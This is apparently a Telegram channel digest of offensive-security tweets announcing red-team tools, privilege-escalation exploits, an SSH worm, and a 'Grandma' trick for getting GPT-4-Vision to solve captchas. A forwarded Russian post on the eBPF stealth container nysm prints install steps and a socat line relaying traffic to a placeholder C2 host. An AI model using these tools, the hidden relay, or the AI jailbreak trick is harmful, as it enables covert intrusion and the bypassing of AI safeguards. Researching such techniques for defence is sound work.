😈 [ Cas van Cooten @chvancooten ]
GPT-4-Vision was trained not to solve Captcha prompts... But this is easy to circumvent with the ol' Grandma exploit 😂
🐥 [ tweet ]
GPT-4-Vision was trained not to solve Captcha prompts... But this is easy to circumvent with the ol' Grandma exploit 😂
🐥 [ tweet ]
😁14👍1🤔1
😈 [ SchrodingersAV @SchrodingersAV ]
Read about a technique involving tampering with scheduled tasks, and was inspired to build a powershell noscript to edit scheduled tasks via the registry keys.
Can be used in memory with powershell!
#redteam #cybersecurity #hacking
🔗 https://gist.github.com/Workingdaturah/991de2d176b4b8c8bafd29cc957e20c2
🐥 [ tweet ]
Read about a technique involving tampering with scheduled tasks, and was inspired to build a powershell noscript to edit scheduled tasks via the registry keys.
Can be used in memory with powershell!
#redteam #cybersecurity #hacking
🔗 https://gist.github.com/Workingdaturah/991de2d176b4b8c8bafd29cc957e20c2
🐥 [ tweet ]
🔥3👍1
Offensive Xwitter
😈 [ SchrodingersAV @SchrodingersAV ] Read about a technique involving tampering with scheduled tasks, and was inspired to build a powershell noscript to edit scheduled tasks via the registry keys. Can be used in memory with powershell! #redteam #cybersecurity…
😈 [ David @dmcxblue ]
Managed to port to C# the Invoke-GhostTask from @SchrodingersAV, added a little bit more details on what is going on.
#redteam
🔗 https://github.com/dmcxblue/SharpGhostTask
🐥 [ tweet ]
Managed to port to C# the Invoke-GhostTask from @SchrodingersAV, added a little bit more details on what is going on.
#redteam
🔗 https://github.com/dmcxblue/SharpGhostTask
🐥 [ tweet ]
🔥4👍2
😈 [ Joshua Rogers @MegaManSec ]
Today I am proud to be officially releasing a tool I've been working on recently: SSH-Snake.
A self-replicating and self-propagating -- completely fileless -- ssh-based worm that discovers ssh private keys and destinations. Make cool graphs, too!
🔗 https://github.com/MegaManSec/SSH-Snake
🐥 [ tweet ]
Today I am proud to be officially releasing a tool I've been working on recently: SSH-Snake.
A self-replicating and self-propagating -- completely fileless -- ssh-based worm that discovers ssh private keys and destinations. Make cool graphs, too!
🔗 https://github.com/MegaManSec/SSH-Snake
🐥 [ tweet ]
👍13
😈 [ BlackArrow @BlackArrowSec ]
Our colleague @IagoAbad has weaponized the leaked token handles technique for MSSQL.
Now open token handles in MSSQL's process (sqlservr.exe) can be abused to change security context and escalate privileges both locally and in the domain.
🔗 https://github.com/blackarrowsec/Handly
🐥 [ tweet ]
Our colleague @IagoAbad has weaponized the leaked token handles technique for MSSQL.
Now open token handles in MSSQL's process (sqlservr.exe) can be abused to change security context and escalate privileges both locally and in the domain.
🔗 https://github.com/blackarrowsec/Handly
🐥 [ tweet ]
🔥5
😈 [ Rasta Mouse @_RastaMouse ]
[BLOG]
First post of 2024. Why, as a C# dev, you should use SafeHandle classes instead of IntPtr's.
🔗 https://rastamouse.me/safehandle-vs-intptr/
🐥 [ tweet ]
[BLOG]
First post of 2024. Why, as a C# dev, you should use SafeHandle classes instead of IntPtr's.
🔗 https://rastamouse.me/safehandle-vs-intptr/
🐥 [ tweet ]
🔥4👍2🤔1
😈 [ Grzegorz Tworek @0gtweet ]
Token stealing (aka duplication) with syscalls only? Not sure if it’s novel approach but had to try anyway. 🤷♂️
NtOpenProcessToken, NtAdjustPrivilegesToken, NtOpenProcess, NtDuplicateToken, and NtSetInformationThread at your service! Enjoy the C code:
🔗 https://github.com/gtworek/PSBits/blob/master/Misc/TokenStealWithSyscalls.c
🐥 [ tweet ]
Token stealing (aka duplication) with syscalls only? Not sure if it’s novel approach but had to try anyway. 🤷♂️
NtOpenProcessToken, NtAdjustPrivilegesToken, NtOpenProcess, NtDuplicateToken, and NtSetInformationThread at your service! Enjoy the C code:
🔗 https://github.com/gtworek/PSBits/blob/master/Misc/TokenStealWithSyscalls.c
🐥 [ tweet ]
👍5🔥1
😈 [ Synacktiv @Synacktiv ]
Have you ever wondered what the attack surface of Counter Strike: Global Offensive looks like? Our ninjas @myr463 and @v1csec studied it and found a server to client bug! Read more details about this research in our latest blogpost.
🔗 https://www.synacktiv.com/publications/exploring-counter-strike-global-offensive-attack-surface
🐥 [ tweet ]
Have you ever wondered what the attack surface of Counter Strike: Global Offensive looks like? Our ninjas @myr463 and @v1csec studied it and found a server to client bug! Read more details about this research in our latest blogpost.
🔗 https://www.synacktiv.com/publications/exploring-counter-strike-global-offensive-attack-surface
🐥 [ tweet ]
👍1🔥1
😈 [ BC Security @bcsecurity ]
Miss Watson and Sherlock? Meet Moriarty, a C# tool that extends the functionality of @_RastaMouse's Watson and Sherlock.
Also adds scans for CVE-2021-44228, CVE-2022-40140, CVE-2022-22965, and many more!
🔗 https://github.com/BC-SECURITY/Moriarty
🐥 [ tweet ]
Miss Watson and Sherlock? Meet Moriarty, a C# tool that extends the functionality of @_RastaMouse's Watson and Sherlock.
Also adds scans for CVE-2021-44228, CVE-2022-40140, CVE-2022-22965, and many more!
🔗 https://github.com/BC-SECURITY/Moriarty
🐥 [ tweet ]
👍1
😈 [ Kyle Avery @kyleavery_ ]
I decided to try something besides Windows this weekend. Here is a Linux sleep obfuscation poc using POSIX timers:
🔗 https://github.com/kyleavery/pendulum
🐥 [ tweet ]
I decided to try something besides Windows this weekend. Here is a Linux sleep obfuscation poc using POSIX timers:
🔗 https://github.com/kyleavery/pendulum
🐥 [ tweet ]
👍2🤯2
Forwarded from Похек (Sergey Zybnev)
This media is not supported in your browser
VIEW IN TELEGRAM
🔴 nysm
Скрытый контейнер для постэксплуатации.
#eBPF #offensive
С ростом популярности offensive инструментов, основанных на eBPF, начиная от кражи учетных данных и заканчивая руткитами, скрывающими свой собственный PID, авторам пришел в голову вопрос: Можно ли сделать eBPF невидимым в глазах админа? В результате они создали nysm, eBPF stealth контейнер, предназначенный для того, чтобы сделать инструменты атакующих незаметными для системных администраторов, не только скрывая eBPF, но и многое другое:
- bpftool
- bpflist-bpfcc
- ps
- top
- sockstat
- ss
- rkhunter
- chkrootkit
- lsof
- auditd
- и другое
Как это работает?
Установка:
Использование:
👉 https://github.com/eeriedusk/nysm
🌚 @poxek
Скрытый контейнер для постэксплуатации.
#eBPF #offensive
С ростом популярности offensive инструментов, основанных на eBPF, начиная от кражи учетных данных и заканчивая руткитами, скрывающими свой собственный PID, авторам пришел в голову вопрос: Можно ли сделать eBPF невидимым в глазах админа? В результате они создали nysm, eBPF stealth контейнер, предназначенный для того, чтобы сделать инструменты атакующих незаметными для системных администраторов, не только скрывая eBPF, но и многое другое:
- bpftool
- bpflist-bpfcc
- ps
- top
- sockstat
- ss
- rkhunter
- chkrootkit
- lsof
- auditd
- и другое
Как это работает?
Поскольку eBPF не может перезаписывать возвращаемые значения или адреса ядра, наша цель - найти вызов самого низкого уровня, взаимодействующий с адресом пользовательского пространства, чтобы перезаписать его значение и скрыть нужные объекты. Чтобы отличить события nysm от других, все выполняется в отдельном пространстве имен PID.
Установка:
sudo apt install git make pkg-config libelf-dev clang llvm bpftool -y; git clone https://github.com/eeriedusk/nysm; cd nysm; bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h; make
Использование:
Usage: nysm [OPTION...] COMMAND
Stealth eBPF container.
-d, --detach Run COMMAND in background
-r, --rm Self destruct after execution
-v, --verbose Produce verbose output
-h, --help Display this help
--usage Display a short usage message
# Примеры
./nysm bash
./nysm -r ssh user@domain
./nysm -dr socat TCP4-LISTEN:80 TCP4:evil.c2:443
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7
😈 [ NCV @nickvourd ]
Proudly Announcing Windows Local Privilege Escalation Cookbook
#pentest #redteam #windows #privesc
🔗 https://github.com/nickvourd/Windows-Local-Privilege-Escalation-Cookbook
🐥 [ tweet ]
Proudly Announcing Windows Local Privilege Escalation Cookbook
#pentest #redteam #windows #privesc
🔗 https://github.com/nickvourd/Windows-Local-Privilege-Escalation-Cookbook
🐥 [ tweet ]
🔥4
😈 [ Elastic Security Labs @elasticseclabs ]
In this follow up from his article in May, @SBousseaden digs deeper into call stacks! See how Elastic Security 8.11 further increases efficacy against in-memory threats:
🔗 https://go.es.io/47vnlPZ
🐥 [ tweet ]
In this follow up from his article in May, @SBousseaden digs deeper into call stacks! See how Elastic Security 8.11 further increases efficacy against in-memory threats:
🔗 https://go.es.io/47vnlPZ
🐥 [ tweet ]
👍3
Forwarded from PT SWARM
New article by our researcher @snovvcrash: "Python ❤️ SSPI: Teaching #Impacket to Respect Windows SSO".
🥷 Read the blog post and you'll fly under the radar of endpoint security mechanisms as well as custom network detection rules more easily.
https://swarm.ptsecurity.com/python-sspi-teaching-impacket-to-respect-windows-sso/
🥷 Read the blog post and you'll fly under the radar of endpoint security mechanisms as well as custom network detection rules more easily.
https://swarm.ptsecurity.com/python-sspi-teaching-impacket-to-respect-windows-sso/
PT SWARM
Python ❤️ SSPI: Teaching Impacket to Respect Windows SSO
One handy feature of our private Impacket (by @fortra) fork is that it can leverage native SSPI interaction for authentication purposes when operating from a legit domain context on a Windows machine. As far as the partial implementation of Ntsecapi represents…
🔥13
😈 [ Mayfly @M4yFly ]
Did you know you didn't need to use a potatoes exploit to going from iis apppool account to admin or system?
🔗 https://threadreaderapp.com/thread/1745581076846690811.html
🐥 [ tweet ]
Did you know you didn't need to use a potatoes exploit to going from iis apppool account to admin or system?
🔗 https://threadreaderapp.com/thread/1745581076846690811.html
🐥 [ tweet ]
🔥9👍2
😈 [ MDSec @MDSecLabs ]
Exploiting CVE-2024-20656, a Local Privilege Escalation in the VSStandardCollectorService150 Service - new research from @filip_dragovic
🔗 https://www.mdsec.co.uk/2024/01/cve-2024-20656-local-privilege-escalation-in-vsstandardcollectorservice150-service/
🔗 https://github.com/Wh04m1001/CVE-2024-20656
🐥 [ tweet ]
Exploiting CVE-2024-20656, a Local Privilege Escalation in the VSStandardCollectorService150 Service - new research from @filip_dragovic
🔗 https://www.mdsec.co.uk/2024/01/cve-2024-20656-local-privilege-escalation-in-vsstandardcollectorservice150-service/
🔗 https://github.com/Wh04m1001/CVE-2024-20656
🐥 [ tweet ]
👍2
😈 [ Vozec @Vozec1 ]
I have implemented the latest CVE-2023-7028 to Account Take-Over on GitLab completely automatically. (CVSS10):
🔗 https://github.com/Vozec/CVE-2023-7028
🐥 [ tweet ]
I have implemented the latest CVE-2023-7028 to Account Take-Over on GitLab completely automatically. (CVSS10):
🔗 https://github.com/Vozec/CVE-2023-7028
🐥 [ tweet ]
👍1🔥1
😈 [ Rasta Mouse @_RastaMouse ]
Ok, is now live. A simple GitBook of code-generated P/Invoke signatures. Just C# for now, but I may add Rust and a few others in the future.
🔗 https://www.pinvoke.dev
🔗 https://github.com/ZeroPointSecurity/PInvoke
🐥 [ tweet ]
Ok, is now live. A simple GitBook of code-generated P/Invoke signatures. Just C# for now, but I may add Rust and a few others in the future.
🔗 https://www.pinvoke.dev
🔗 https://github.com/ZeroPointSecurity/PInvoke
🐥 [ tweet ]
👍4
😈 [ Daniel Feichter @VirtualAllocEx ]
I was interested to learn more about Vectored Exception Handling and how it can be used in malware development. Hence my first blog post of the year ennoscriptd "Syscalls via Vectored Exception Handling".
🔗 https://redops.at/en/blog/syscalls-via-vectored-exception-handling
🐥 [ tweet ]
I was interested to learn more about Vectored Exception Handling and how it can be used in malware development. Hence my first blog post of the year ennoscriptd "Syscalls via Vectored Exception Handling".
🔗 https://redops.at/en/blog/syscalls-via-vectored-exception-handling
🐥 [ tweet ]
👍3
😈 [ Steve Campbell @lpha3ch0 ]
I felt like httpx was missing the ability to parse Nmap reports for http/s services and it made more sense to create a standalone utility. Nmapurls parses Nmap xml reports and outputs a list of URL's.
🔗 https://github.com/sdcampbell/nmapurls
🐥 [ tweet ]
I felt like httpx was missing the ability to parse Nmap reports for http/s services and it made more sense to create a standalone utility. Nmapurls parses Nmap xml reports and outputs a list of URL's.
🔗 https://github.com/sdcampbell/nmapurls
🐥 [ tweet ]